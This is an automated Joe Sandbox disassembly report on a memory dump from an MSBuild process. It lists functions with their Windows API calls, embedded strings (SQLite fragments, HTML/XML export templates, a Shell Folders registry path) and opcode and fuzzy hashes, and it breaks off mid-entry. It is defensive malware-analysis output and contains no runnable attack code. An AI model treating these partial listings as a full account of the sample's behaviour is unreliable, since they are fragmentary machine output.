Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E

memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A

Strings

gj, xrefs: 0044A7D9

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memset
String ID: gj
API String ID: 438689982-4203073231
Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797

Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77

Strings

CREATE TABLE , xrefs: 00430CEB
h\E, xrefs: 00430D2B
, xrefs: 00430CAC
t\El\E, xrefs: 00430D91
, , xrefs: 00430CB3
h\E, xrefs: 00430D19

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
API String ID: 3510742995-2446657581
Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98

Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00405A25
SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
memset.MSVCRT ref: 00405ABB
SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
SetFocus.USER32(?), ref: 00405B76

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4

Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

wcscat.MSVCRT ref: 0040FB02
_snwprintf.MSVCRT ref: 0040FB29

Strings

<td bgcolor=#%s nowrap>%s, xrefs: 0040FA43
<td bgcolor=#%s>%s, xrefs: 0040FA51
<tr>, xrefs: 0040FA5B
 , xrefs: 0040FAFC

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94

Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 0040D7BD
memset.MSVCRT ref: 0040D7DC
GetMenuItemInfoW.USER32 ref: 0040D818
wcschr.MSVCRT ref: 0040D830

Strings

0, xrefs: 0040D7F7
6, xrefs: 0040D7FF

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A

Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9

memset.MSVCRT ref: 00405455
memset.MSVCRT ref: 0040546C
memset.MSVCRT ref: 00405483
memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD

Strings

6, xrefs: 004054C3
\, xrefs: 004054BB

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$memcpy$ErrorLast
String ID: 6$\
API String ID: 404372293-1284684873
Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65

Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
wcscpy.MSVCRT ref: 0040A0D9
wcscat.MSVCRT ref: 0040A0E6
wcscat.MSVCRT ref: 0040A0F5
wcscpy.MSVCRT ref: 0040A107

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A

Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(?,00000000), ref: 00404398
GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
GetProcAddress.KERNEL32(?,00000000), ref: 004043E7

Strings

advapi32.dll, xrefs: 0040436D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
String ID: advapi32.dll
API String ID: 2012295524-4050573280
Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD

Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410055
memset.MSVCRT ref: 0041006A
_snwprintf.MSVCRT ref: 004100B7

Strings

<?xml version="1.0" ?>, xrefs: 0041007C
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
<%s>, xrefs: 004100A6

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99

Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A198
_snwprintf.MSVCRT ref: 0040A1BF
wcscat.MSVCRT ref: 0040A1D1
wcscat.MSVCRT ref: 0040A1EE
wcscat.MSVCRT ref: 0040A1FD

Strings

%2.2X, xrefs: 0040A1AE

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A

Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040D5FB
wcscpy.MSVCRT ref: 0040D61E

Strings

dialog_%d, xrefs: 0040D5EF
menu_%d, xrefs: 0040D5DF
general, xrefs: 0040D614
strings, xrefs: 0040D609

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F

Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00408DFA

Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44

memset.MSVCRT ref: 00408E46
memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memsetstrlen
String ID:
API String ID: 2350177629-0
Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6

Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042AE4C

Strings

ORDER, xrefs: 0042AFD7
GROUP, xrefs: 0042B009
8, xrefs: 0042AF64
aggregate functions are not allowed in the GROUP BY clause, xrefs: 0042B08F
a GROUP BY clause is required before HAVING, xrefs: 0042B07B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset
String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
API String ID: 2221118986-1606337402
Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B

Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
memset.MSVCRT ref: 00408FD4
memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
memset.MSVCRT ref: 00409042
memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079

Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcmpmemset$_mbscpymemcpystrlen
String ID:
API String ID: 265355444-0
Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5

Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6

Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5

Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD

memset.MSVCRT ref: 0040C439
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
_wcsupr.MSVCRT ref: 0040C481

Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F

memset.MSVCRT ref: 0040C4D0
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
String ID:
API String ID: 4131475296-0
Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5

Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004116FF

Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C

Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1

Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3

Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF

Strings

*.htm;*.html, xrefs: 00411765
*.xml, xrefs: 0041178C
*.txt, xrefs: 00411721
*.csv, xrefs: 00411750
txt, xrefs: 00411704

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
API String ID: 2618321458-3614832568
Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99

Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004185FC
GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
free.MSVCRT ref: 00418650

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AttributesFilefreememset
String ID:
API String ID: 2507021081-0
Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE

Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 004174FC
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
malloc.MSVCRT ref: 00417524
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
free.MSVCRT ref: 00417544
free.MSVCRT ref: 00417562

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWidefree$ApisFilemalloc
String ID:
API String ID: 4131324427-0
Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD

Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
free.MSVCRT ref: 0041822B

Strings

etilqs_, xrefs: 00418233
%s\etilqs_, xrefs: 00418282

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: PathTemp$free
String ID: %s\etilqs_$etilqs_
API String ID: 924794160-1420421710
Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D

Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FDD5

Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC

Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE

_snwprintf.MSVCRT ref: 0040FE1F

Strings

<item>, xrefs: 0040FDA8
</item>, xrefs: 0040FE3B
<%s>%s</%s>, xrefs: 0040FE12

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9

Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 0041477F
wcscpy.MSVCRT ref: 0041479A
CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
CloseHandle.KERNEL32(00000000), ref: 004147C8

Strings

General, xrefs: 00414794

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcscpy$CloseCreateFileHandle
String ID: General
API String ID: 999786162-26480598
Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669

Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00409750
_snwprintf.MSVCRT ref: 0040977D
MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796

Strings

Error %d: %s, xrefs: 0040976C
Error, xrefs: 00409787

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
